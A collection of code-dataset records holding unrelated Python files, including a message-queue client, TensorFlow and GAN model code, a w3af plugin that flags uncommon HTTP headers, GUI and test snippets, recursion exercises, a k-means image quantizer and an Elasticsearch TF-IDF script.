MSG_TYPE.MSG_TYPE_RSP_POS:\n m = PositionEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_Hist:\n m = 
HistoricalEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RSP_ACCOUNT:\n m = AccountEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RSP_CONTRACT:\n m = ContractEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif v[2].startswith('3') : #msg2type == MSG_TYPE.MSG_TYPE_INFO:\n m = InfoEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n pass\n except Exception as e: \n pass\n try:\n # request, qry msg to server\n msgout = self._outgoing_quue.get(False)\n print('outgoing get msg,begin send',msgout,datetime.now())\n # self._send_sock.send(bytes(msgout,\"ascii\"), flags=0)\n self._send_sock.send(msgout, flags=1)\n print('outgoing end send',msgout,datetime.now())\n except Exception as e:\n pass\n\n def start(self, timer=True):\n \"\"\"\n start the mq thread\n \"\"\"\n self._recv_sock = Socket(SUB)\n self._send_sock = Socket(PUSH)\n self._monitor_sock = Socket(SUB)\n # print(os.getpid())\n self._recv_sock.connect(self._config['serverpub_url'])\n self._recv_sock.set_string_option(SUB, SUB_SUBSCRIBE, '') # receive msg start with all\n self._recv_sock.set_int_option(SOL_SOCKET,RCVTIMEO,100) \n self._send_sock.connect(self._config['serverpull_url'])\n self._monitor_sock.connect(self._config['serversub_url'])\n self._active = True\n if not self._thread.isAlive():\n self._thread.start()\n\n def stop(self):\n \"\"\"\n stop the mq thread\n \"\"\"\n self._active = False\n\n if self._thread.isAlive():\n self._thread.join()","sub_path":"source/common/client_mq.py","file_name":"client_mq.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"519522312","text":"import tensorflow as tf\n\n# Normal loading (recommended)\nx = tf.Variable(10, name='x')\ny = tf.Variable(20, name='y')\nz = tf.add(x, y) # create the node before executing the graph\n\nwriter = tf.summary.FileWriter('./graphs/normal_loading', tf.get_default_graph())\nwith tf.Session() as sess:\n\tsess.run(tf.global_variables_initializer())\n\tfor _ in range(10):\n\t\tsess.run(z)\nwriter.close()\n\n# Lazy loading\nx = tf.Variable(10, name='x')\ny = tf.Variable(20, name='y')\n\nwriter = tf.summary.FileWriter('./graphs/lazy_loading', tf.get_default_graph())\nwith tf.Session() as sess:\n\tsess.run(tf.global_variable_initializer())\n\tfor _ in range(10):\n\t\tsess.run(tf.add(x, y))\t# someone decides to be clever to save one line of code\nwriter.close()","sub_path":"02_lazy_loading.py","file_name":"02_lazy_loading.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"87592894","text":"\"\"\"\nwg_strange_headers.py\n\nCopyright 2006 Andres Riancho\n\nThis file is part of w3af, http://w3af.org/ .\n\nw3af is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation version 2 of the License.\n\nw3af is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
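One detail in the lazy-loading snippet above: the second block calls tf.global_variable_initializer, but the TF1 API spells it tf.global_variables_initializer (with an "s"), and each sess.run(tf.add(x, y)) inside the loop adds a fresh Add node to the graph. A sketch that makes the graph growth visible, assuming a TensorFlow 1.x installation:

import tensorflow as tf  # 1.x API assumed

x = tf.Variable(10, name='x')
y = tf.Variable(20, name='y')

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    before = len(tf.get_default_graph().get_operations())
    for _ in range(10):
        sess.run(tf.add(x, y))   # one new Add node per iteration
    after = len(tf.get_default_graph().get_operations())
    print(after - before)        # 10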
See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with w3af; if not, write to the Free Software\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\"\"\"\nfrom w3af.core.controllers.plugins.audit_plugin import AuditPlugin\nfrom w3af.core.data.kb.info import Info\n\n\nclass wg_strange_headers(AuditPlugin):\n \"\"\"\n Check for uncommon headers sent in HTTP response.\n\n :author: Andres Riancho (andres.riancho@gmail.com)\n :author: EM (mailto@zensecurity.su)\n \"\"\"\n # Remember that this headers are only the ones SENT BY THE SERVER TO THE\n # CLIENT. Headers must be uppercase in order to compare them\n COMMON_HEADERS = {'ACCEPT-RANGES', 'AGE', 'ALLOW', 'CONNECTION',\n 'CONTENT-DISPOSITION', 'CONTENT-ENCODING',\n 'CONTENT-LENGTH', 'CONTENT-TYPE', 'CONTENT-SCRIPT-TYPE',\n 'CONTENT-STYLE-TYPE', 'CONTENT-SECURITY-POLICY',\n 'CONTENT-SECURITY-POLICY-REPORT-ONLY', 'CONTENT-LANGUAGE',\n 'CONTENT-LOCATION', 'CACHE-CONTROL', 'DATE', 'EXPIRES',\n 'ETAG', 'FRAME-OPTIONS', 'KEEP-ALIVE', 'LAST-MODIFIED',\n 'LOCATION', 'P3P', 'PUBLIC', 'PUBLIC-KEY-PINS',\n 'PUBLIC-KEY-PINS-REPORT-ONLY', 'PRAGMA',\n 'PROXY-CONNECTION', 'SET-COOKIE', 'SERVER',\n 'STRICT-TRANSPORT-SECURITY', 'TRANSFER-ENCODING', 'VIA',\n 'VARY', 'WWW-AUTHENTICATE', 'X-FRAME-OPTIONS',\n 'X-CONTENT-TYPE-OPTIONS', 'X-POWERED-BY',\n 'X-ASPNET-VERSION', 'X-CACHE', 'X-UA-COMPATIBLE', 'X-PAD',\n 'X-XSS-PROTECTION', 'MIME-VERSION', 'ALTERNATE-PROTOCOL', 'X-XRDS-LOCATION',\n 'ACCESS-CONTROL-ALLOW-ORIGIN'}\n\n def audit(self, freq, orig_response):\n \"\"\"\n :param freq: A FuzzableRequest\n :param orig_resp: The HTTP response we get from sending the freq\n :return: None, all results are saved in the kb.\n \"\"\"\n # Should we remove that check for protocol anomalies ? # by em\n self._content_location_not_300(freq, orig_response)\n\n # Check header names\n for header_name in orig_response.get_headers().keys():\n if header_name.upper() in self.COMMON_HEADERS:\n continue\n # Create a new info object and save it to the KB\n header_value = orig_response.get_headers()[header_name]\n\n desc = 'Host sent strange HTTP header: \"{}\" with value: \"{}\", ' \\\n 'which is quite uncommon and requires manual analysis.'.format(header_name, header_value)\n i = Info('Strange header', desc, orig_response.id, self.get_name())\n i.set_url(orig_response.get_url())\n self.kb_append(self, 'wg_strange_headers', i)\n\n def _content_location_not_300(self, freq, orig_response):\n \"\"\"\n Check if the response has a content-location header and the response\n code is not in the 300 range.\n\n :return: None, all results are saved in the kb.\n \"\"\"\n response_url = orig_response.get_url()\n\n headers = orig_response.get_headers()\n header_value = headers.get('content-location', None)\n\n if header_value is not None and 300 < orig_response.get_code() < 310:\n desc = 'The URL: \"{}\" sent the HTTP header: \"content-location\" ' \\\n 'with value: \"{}\" in an HTTP response with code {} ' \\\n 'which is a violation to the RFC.'.format(response_url, header_value, orig_response.get_code())\n i = Info('Content-Location HTTP header anomaly', desc, orig_response.id, self.get_name())\n i.set_url(response_url)\n self.kb_append(self, 'wg_anomaly', i)\n\n def get_long_desc(self):\n \"\"\"\n :return: A DETAILED description of the plugin functions and features.\n \"\"\"\n return 'This plugin checks for non-common headers sent in HTTP responses. 
' \\\n 'It is could be useful to identify special modules and features added to the server.'\n\n def get_name(self):\n \"\"\"\n :return: Common name for the current plugin\n \"\"\"\n return 'strange headers'","sub_path":"w3af-repo/w3af/plugins/audit/wg_strange_headers.py","file_name":"wg_strange_headers.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"239493467","text":"# -*- coding: utf-8 -*-\n\nfrom ig_api import db, app\nfrom ig_api.helpers import send_trans_email\n\n\n## Exceptions\n\nclass SignUpRequestException(Exception):\n def __init__(self):\n self.message = 'There was a problem while saving the sign up request.'\n\n\n## Models\n\nclass SignUpRequestModel(db.Document):\n name = db.StringField(required=True)\n email = db.EmailField(required=True)\n phone = db.StringField()\n\n meta = {'collection': 'signup_requests'}\n\n @staticmethod\n def create(name, email, phone=None):\n \"\"\"Creates a new model with the details of the sign up request.\"\"\"\n # create model\n request = SignUpRequestModel(name=name, email=email)\n if phone:\n request.phone = phone\n # raise error in case of validation problem\n try:\n request.save()\n except (db.ValidationError):\n raise SignUpRequestException\n\n # send e-Mail\n email_vars = {\n 'name': name,\n 'email': email,\n 'phone': phone\n }\n send_trans_email('signup_request', ['{0} <{1}>'.format('InGage Admin', email), ], email_vars)\n\n return request\n\n def __repr__(self):\n return ''.format(self.name, self.email)\n","sub_path":"api/ig_api/misc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"299288587","text":"import sys\nfrom PyQt4 import QtGui\n\nclass MyForm(QtGui.QWidget):\n\n\tdef __init__(self):\n\t\tsuper(MyForm, self).__init__()\n\n\t\tlbl = QtGui.QLabel('My First UI Element!', self)\n\n\n\n\napp = QtGui.QApplication(sys.argv)\nmainWindow = MyForm()\nstatus = app.exec_()\nsys.exit(status)","sub_path":"PythonResources/CBTNuggets/13-PyQt/PyQt1.py","file_name":"PyQt1.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"333866990","text":"__author__ = 'Willem Elbers (MPI-TLA) \\\n Claudio Cacciari (Cineca) '\n\nimport ConfigParser\n\nclass ConfigLoader():\n\n def __init__(self, config_file):\n\n self.config_file = config_file\n self.config = ConfigParser.ConfigParser()\n self.config.read(self.config_file)\n\n def SectionMap(self, section):\n\n dict1 = {}\n options = self.config.options(section)\n for option in options:\n try:\n dict1[option] = self.config.get(section, option)\n except:\n dict1[option] = None\n return dict1\n","sub_path":"db/scripts/ConfigLoader.py","file_name":"ConfigLoader.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"392921640","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nfrom random import randrange\nimport random\n\n\ndef test_modify_group_name(app):\n if app.group.count_groups() == 0:\n app.group.create(Group(name=\"for_modification\"))\n old_groups = app.group.get_group_list()\n group = Group(name=\"test_for_modification???\")\n index = randrange(len(old_groups))\n group.id = old_groups[index].id\n app.group.modify_some_group(group, index)\n assert len(old_groups) == 
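The ConfigLoader above collapses one ConfigParser section into a plain dict; the same idea with only the standard library (the [database] section and its keys are invented for illustration):

import configparser

config = configparser.ConfigParser()
config.read_string("""
[database]
host = localhost
port = 5432
""")

# Same idea as SectionMap: flatten one section into a dict.
section = dict(config.items("database"))
print(section["host"], section["port"])   # localhost 5432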
app.group.count_groups()\n new_groups = app.group.get_group_list()\n old_groups[index] = group\n assert sorted(new_groups, key=Group.id_or_max) == sorted(old_groups, key=Group.id_or_max)\n\n\ndef test_modify_group_db(app, db, check_ui):\n if len(db.get_group_list()) == 0:\n app.group.create(Group(name=\"for_modification\", header=\"for_modification\", footer=\"for_modification\"))\n old_groups = db.get_group_list()\n modify_data = Group(name=\"mmm\", header=\"mmm\", footer=\"mmm\")\n group = random.choice(old_groups)\n app.group.modify_some_group_by_id(modify_data, group.id)\n modify_data.id = group.id\n new_groups = db.get_group_list()\n old_groups.remove(group)\n old_groups.append(modify_data)\n assert sorted(new_groups, key=Group.id_or_max) == sorted(old_groups, key=Group.id_or_max)\n #assert new_groups == old_groups\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","sub_path":"test/test_modify_group.py","file_name":"test_modify_group.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"625143673","text":"import math\r\n\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom spectral import SpectralNorm\r\nfrom torch.autograd import Variable\r\n\r\n\r\nclass Self_Attn(nn.Module):\r\n \"\"\" Self attention Layer\"\"\"\r\n\r\n def __init__(self, in_dim, activation):\r\n super(Self_Attn, self).__init__()\r\n self.chanel_in = in_dim\r\n self.activation = activation\r\n\r\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\r\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\r\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\r\n self.gamma = nn.Parameter(torch.zeros(1))\r\n\r\n self.softmax = nn.Softmax(dim=-1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n inputs :\r\n x : input feature maps( B X C X W X H)\r\n returns :\r\n out : self attention value + input feature\r\n attention: B X N X N (N is Width*Height)\r\n \"\"\"\r\n m_batchsize, C, width, height = x.size()\r\n proj_query = self.query_conv(x).view(m_batchsize, -1, width *\r\n height).permute(0, 2, 1) # B X CX(N)\r\n proj_key = self.key_conv(x).view(m_batchsize, -1, width*height) # B X C x (*W*H)\r\n energy = torch.bmm(proj_query, proj_key) # transpose check\r\n attention = self.softmax(energy) # BX (N) X (N)\r\n proj_value = self.value_conv(x).view(m_batchsize, -1, width*height) # B X C X N\r\n\r\n out = torch.bmm(proj_value, attention.permute(0, 2, 1))\r\n out = out.view(m_batchsize, C, width, height)\r\n\r\n out = self.gamma*out + x\r\n return out, attention\r\n\r\n\r\nclass Generator(nn.Module):\r\n \"\"\"Generator.\"\"\"\r\n\r\n def __init__(self, batch_size, image_size=64, z_dim=100, extra_inputs_gen=0, conv_dim=64):\r\n super(Generator, self).__init__()\r\n self.imsize = image_size\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last = []\r\n\r\n repeat_num = int(np.log2(self.imsize)) - 3\r\n mult = 2 ** repeat_num # 8\r\n layer1.append(SpectralNorm(nn.ConvTranspose2d(z_dim+extra_inputs_gen, conv_dim * mult, 4)))\r\n layer1.append(nn.BatchNorm2d(conv_dim * mult))\r\n layer1.append(nn.ReLU())\r\n\r\n curr_dim = conv_dim * mult\r\n\r\n layer2.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer2.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n 
layer2.append(nn.ReLU())\r\n\r\n curr_dim = int(curr_dim / 2)\r\n\r\n layer3.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer3.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n layer3.append(nn.ReLU())\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n curr_dim = int(curr_dim / 2)\r\n layer4.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer4.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n layer4.append(nn.ReLU())\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = int(curr_dim / 2)\r\n\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last.append(nn.ConvTranspose2d(curr_dim, 3, 4, 2, 1))\r\n last.append(nn.Tanh())\r\n self.last = nn.Sequential(*last)\r\n\r\n self.attn1 = Self_Attn(128, 'relu')\r\n self.attn2 = Self_Attn(64, 'relu')\r\n\r\n # self.encoder = _Encoder(image_size, z_dim, conv_dim, nc=3)\r\n self.encoder = _EncoderSA(batch_size=batch_size, image_size=image_size,\r\n conv_dim=conv_dim, nz=z_dim)\r\n\r\n def forward(self, z):\r\n z = z.view(z.size(0), z.size(1), 1, 1)\r\n out = self.l1(z)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out = self.last(out)\r\n\r\n return out, p1, p2\r\n\r\n\r\nclass Discriminator(nn.Module):\r\n \"\"\"Discriminator, Auxiliary Classifier.\"\"\"\r\n\r\n def __init__(self, batch_size=64, image_size=64, conv_dim=64):\r\n super(Discriminator, self).__init__()\r\n self.imsize = image_size\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last = []\r\n\r\n layer1.append(SpectralNorm(nn.Conv2d(3, conv_dim, 4, 2, 1)))\r\n layer1.append(nn.LeakyReLU(0.1))\r\n\r\n curr_dim = conv_dim\r\n\r\n layer2.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer2.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n layer3.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer3.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n layer4.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer4.append(nn.LeakyReLU(0.1))\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = curr_dim*2\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last.append(nn.Conv2d(curr_dim, 1, 4))\r\n self.last = nn.Sequential(*last)\r\n\r\n self.attn1 = Self_Attn(256, 'relu')\r\n self.attn2 = Self_Attn(512, 'relu')\r\n\r\n def forward(self, x):\r\n out = self.l1(x)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out = self.last(out)\r\n\r\n return out.squeeze(), p1, p2\r\n\r\n\r\nclass _Sampler(nn.Module):\r\n def __init__(self):\r\n super(_Sampler, self).__init__()\r\n\r\n def forward(self, input):\r\n mu = input[0]\r\n logvar = input[1]\r\n\r\n std = logvar.mul(0.5).exp_() # calculate the STDEV\r\n if True: # opt.cuda:\r\n eps = torch.cuda.FloatTensor(std.size()).normal_() # random normalized noise\r\n else:\r\n eps = torch.FloatTensor(std.size()).normal_() # random normalized noise\r\n eps = Variable(eps)\r\n return eps.mul(std).add_(mu)\r\n\r\n\r\nclass _Encoder(nn.Module):\r\n def __init__(self, imageSize, nz, conv_dim=64, nc=3):\r\n super(_Encoder, self).__init__()\r\n\r\n n = math.log2(imageSize)\r\n\r\n assert n == round(n), 'imageSize must be a power of 2'\r\n assert n >= 3, 'imageSize must be at 
least 8'\r\n n = int(n)\r\n self.sampler = _Sampler()\r\n self.nz = nz\r\n ngf = conv_dim\r\n self.conv1 = nn.Conv2d(ngf * 2**(n-3), nz, 4)\r\n self.conv2 = nn.Conv2d(ngf * 2**(n-3), nz, 4)\r\n print(\"ngf\", ngf)\r\n print(\"nz\", nz)\r\n print(\"n\", n)\r\n self.encoder = nn.Sequential()\r\n # input is (nc) x 64 x 64\r\n self.encoder.add_module('input-conv', nn.Conv2d(nc, ngf, 4, 2, 1, bias=False))\r\n self.encoder.add_module('input-relu', nn.LeakyReLU(0.1))\r\n for i in range(n-3):\r\n # state size. (ngf) x 32 x 32\r\n self.encoder.add_module('pyramid{0}-{1}conv'.format(ngf*2**i, ngf * 2**(i+1)),\r\n nn.Conv2d(ngf*2**(i), ngf * 2**(i+1), 4, 2, 1, bias=False))\r\n self.encoder.add_module('pyramid{0}batchnorm'.format(\r\n ngf * 2**(i+1)), nn.BatchNorm2d(ngf * 2**(i+1)))\r\n self.encoder.add_module('pyramid{0}relu'.format(\r\n ngf * 2**(i+1)), nn.LeakyReLU(0.1))\r\n\r\n # state size. (ngf*8) x 4 x 4\r\n\r\n def forward(self, input):\r\n output = self.encoder(input)\r\n return [self.conv1(output).view(-1, self.nz), self.conv2(output).view(-1, self.nz)]\r\n\r\n\r\nclass _EncoderSA(nn.Module):\r\n \"\"\"Discriminator, Auxiliary Classifier.\"\"\"\r\n\r\n def __init__(self, batch_size=64, image_size=64, conv_dim=64, nz=100):\r\n super(_EncoderSA, self).__init__()\r\n self.imsize = image_size\r\n self.sampler = _Sampler()\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last1 = []\r\n last2 = []\r\n self.nz = nz\r\n layer1.append(SpectralNorm(nn.Conv2d(3, conv_dim, 4, 2, 1)))\r\n layer1.append(nn.LeakyReLU(0.1))\r\n\r\n curr_dim = conv_dim\r\n\r\n layer2.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer2.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n layer3.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer3.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n layer4.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer4.append(nn.LeakyReLU(0.1))\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = curr_dim*2\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last1.append(nn.Conv2d(curr_dim, nz, 4))\r\n self.last1 = nn.Sequential(*last1)\r\n last2.append(nn.Conv2d(curr_dim, nz, 4))\r\n self.last2 = nn.Sequential(*last2)\r\n\r\n self.attn1 = Self_Attn(256, 'relu')\r\n self.attn2 = Self_Attn(512, 'relu')\r\n\r\n def forward(self, x):\r\n out = self.l1(x)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out1 = self.last1(out)\r\n out2 = self.last2(out)\r\n # mu and var\r\n return out1.view(-1, self.nz), out2.view(-1, self.nz) # p1, p2\r\n","sub_path":"sagan_models.py","file_name":"sagan_models.py","file_ext":"py","file_size_in_byte":9689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"645785974","text":"# factional function\nprint('factional function')\n\n\ndef straight_forward_factional(n): # classical implementation\n result = n\n for i in range(n):\n result *= i\n return result\n\n\ndef recursive_factional(n): # recursive implementation\n if n == 1:\n return 1 # break condition\n else:\n return n * recursive_factional(n - 1)\n\n\n# power function\nprint('power function')\n\n\ndef straight_forward_power(x, n): # classical implementation\n result = 1\n for i in range(n):\n result *= x\n return result\n\n\ndef recursive_power(x, n):\n if n == 0:\n return 1\n 
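The Self_Attn layer above computes an N x N attention map over all N = W*H spatial positions (energy = Q^T K, softmax over the last axis, then V mixed by the attention weights). A plain-numpy shape walkthrough of the same computation for one image, with random matrices standing in for the 1x1 convolutions (all names here are my own):

import numpy as np

def softmax(z, axis=-1):
    e = np.exp(z - z.max(axis=axis, keepdims=True))
    return e / e.sum(axis=axis, keepdims=True)

C, W, H = 16, 8, 8
N = W * H
rng = np.random.default_rng(1)
x = rng.normal(size=(C, N))        # one image: channels x positions

Wq = rng.normal(size=(C // 8, C))  # stand-ins for query/key/value convs
Wk = rng.normal(size=(C // 8, C))
Wv = rng.normal(size=(C, C))

q, k, v = Wq @ x, Wk @ x, Wv @ x
energy = q.T @ k                   # (N, N): every position vs every other
attn = softmax(energy, axis=-1)
out = v @ attn.T                   # (C, N), features mixed across positions
print(out.shape)                   # (16, 64)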
else:\n return x * recursive_power(x, n - 1)\n\n\n# binary search\nprint('binary search')\n\n\ndef search(sequence, number, lower=0, upper=None):\n if upper is None:\n upper = len(sequence) - 1\n\n if lower == upper:\n assert number == sequence[upper]\n return upper\n else:\n middle = (lower + upper) // 2\n if number > sequence[middle]:\n return search(sequence, number, middle + 1, upper)\n else:\n return search(sequence, number, lower, middle)\n\n\nseq = [34, 67, 123, 4, 100, 95]\nseq.sort()\nprint(search(seq, 123))\n# 5\n","sub_path":"beginning-python/06/06-07-recursive.py","file_name":"06-07-recursive.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"332373421","text":"from PIL import Image\n\nfrom kmeans import *\n\ndef saveImage(image, filename):\n image.save(filename)\n print(\"saved image: \"+filename)\n\ndef createEmptyImage(width, height):\n return Image.new('RGB', (width, height))\n\ndef paintPixel(image, x, y, color):\n #print(\"Painting pixel \"+str(x)+\", \"+str(y)+\" c\"+str(color))\n image.putpixel((x, y), color)\n\ndef readImage(filename):\n return Image.open(filename)\n\ndef getPixel(image, x, y):\n return image.getpixel((x, y))\n\ndef getImageSize(image):\n return image.size\n\ndef getLowestScoreing(array):\n l_score = None\n l_dict = None\n l_cent = None\n l_iter = None\n\n for item in array:\n if l_score == None:\n l_score = item[1]\n l_dict = item[0]\n l_cent = item[2]\n l_iter = item[3]\n else:\n if item[1] < l_score:\n l_score = item[1]\n l_dict = item[0]\n l_cent = item[2]\n l_iter = item[3]\n return (l_dict, l_cent, l_iter)\n\ndef createImageFromBest(filename, image, k, kmeans):\n size = getImageSize(image)\n best = getLowestScoreing(kmeans[2])\n Colors = best[1]\n\n print(\"Creating new Image! Using iteration \"+str(best[2]))\n nim = createEmptyImage(size[0], size[1])\n for x in range(size[0]):\n for y in range(size[1]):\n p = getPixel(image, x, y)\n clr = Colors[getClosestCentroidIDAndDistance([p[0], p[1], p[2]], Colors)[0]]\n clr = (int(clr[0]), int(clr[1]), int(clr[2]))\n paintPixel(nim, x, y, clr) # color: get color of closest centeroid\n filename = \"KM_k\"+str(k)+\"_i\"+str(best[2])+\"_\"+filename+\".png\"\n print(\"Writing to image! \"+filename)\n saveImage(nim, filename)\n\ndef createImagesForAll(filename, image, k, kmeans):\n timeline = kmeans[2]\n size = getImageSize(image)\n\n for line in timeline:\n # print timeline\n clusters = line[0]\n Colors = line[2]\n iter = line[3]\n\n print(\"Creating new Image! Using iteration \"+str(iter))\n nim = createEmptyImage(size[0], size[1])\n for x in range(size[0]):\n for y in range(size[1]):\n p = getPixel(image, x, y)\n clr = Colors[getClosestCentroidIDAndDistance([p[0], p[1], p[2]], Colors)[0]]\n clr = (int(clr[0]), int(clr[1]), int(clr[2]))\n paintPixel(nim, x, y, clr) # color: get color of closest centeroid\n t_filename = \"KM_k\"+str(k)+\"_i\"+str(iter)+\"_\"+filename+\".png\"\n print(\"Writing to image! 
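The recursive search above asserts that the number is present once the range narrows to one element; the standard library's bisect gives the index without that assumption (my own variant, same test data):

from bisect import bisect_left

def index_of(sequence, number):
    # Index of number in the sorted sequence, or -1 if absent.
    i = bisect_left(sequence, number)
    if i < len(sequence) and sequence[i] == number:
        return i
    return -1

seq = sorted([34, 67, 123, 4, 100, 95])
print(index_of(seq, 123))   # 5
print(index_of(seq, 99))    # -1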
\"+t_filename)\n saveImage(nim, t_filename)\n\n\n\ndef VisualizeKM(filename, k=3, iter=-1, write_all=False):\n img = readImage(filename)\n\n size = getImageSize(img)\n # create dataset\n\n print(\"Reading image!\")\n data_set = []\n for x in range(size[0]):\n for y in range(size[1]):\n pd = getPixel(img, x, y)\n data_set.append([pd[0], pd[1], pd[2]])\n\n print(\"Running K-Means algorithm!\")\n res = KMeans(data_set, k, iter)\n if write_all:\n createImagesForAll(filename, img, k, res)\n else:\n createImageFromBest(filename, img, k, res)\n\n\ndef svKM():\n filename = input(\"Name of file to compress: \")\n k = int(input(\"How large k?: \"))\n wai = input(\"Write image for all iterations?(Yes/No) (default is No) \").lower()\n if wai == \"yes\" or wai == \"y\" or wai == \"ye\":\n VisualizeKM(filename, k, write_all=True)\n else:\n VisualizeKM(filename, k)\n #print(\"Image created with name: KM_k\"+str(k)+\"_\"+filename+\".png\")\n\nsvKM()\n","sub_path":"visualKM.py","file_name":"visualKM.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"620594991","text":"from datetime import datetime\nimport time\nimport json\nimport sys\nimport traceback\nimport os\nimport gensim\nfrom gensim import corpora\nfrom gensim.models import TfidfModel\nfrom common import prs\nfrom common import cmm\nimport numpy as np \nfrom operator import itemgetter\nfrom elasticsearch import Elasticsearch\nimport topic_analysis.esAccount as esAcc \n\nif os.name == \"nt\":# 윈도우 운영체제\n from eunjeon import Mecab\nelse:# 현재 리눅스 서버 및 맥은 konlpy으로 미캡 모듈 import\n from konlpy.tag import Mecab\n\nes = Elasticsearch(\n [esAcc.host],\n http_auth=(esAcc.id, esAcc.password),\n scheme=\"https\",\n port= esAcc.port,\n verify_certs=False\n)\nindex = esAcc.index\n \n\nDIR_HomeGraph = \"./tfidfHomeGraphdata.json\"\nDIR_EntireTfidf = \"./tfidfs/tfidfTotaldata\" \n\n\ndef makeCorpus (resp):\n corpus = []\n for oneDoc in resp['hits']['hits']:\n #print(len(oneDoc[\"_source\"][\"hash_key\"]))\n #print(oneDoc[\"_source\"][\"hash_key\"])\n if \"file_extracted_content\" in oneDoc[\"_source\"].keys():\n corpus.append(\n {\n \"hash_key\" : oneDoc[\"_source\"][\"hash_key\"],\n \"post_title\" : oneDoc[\"_source\"][\"post_title\"],\n \"content\" : oneDoc[\"_source\"][\"file_extracted_content\"]\n }\n )\n elif \"hash_key\" in oneDoc[\"_source\"].keys():\n corpus.append(\n {\n 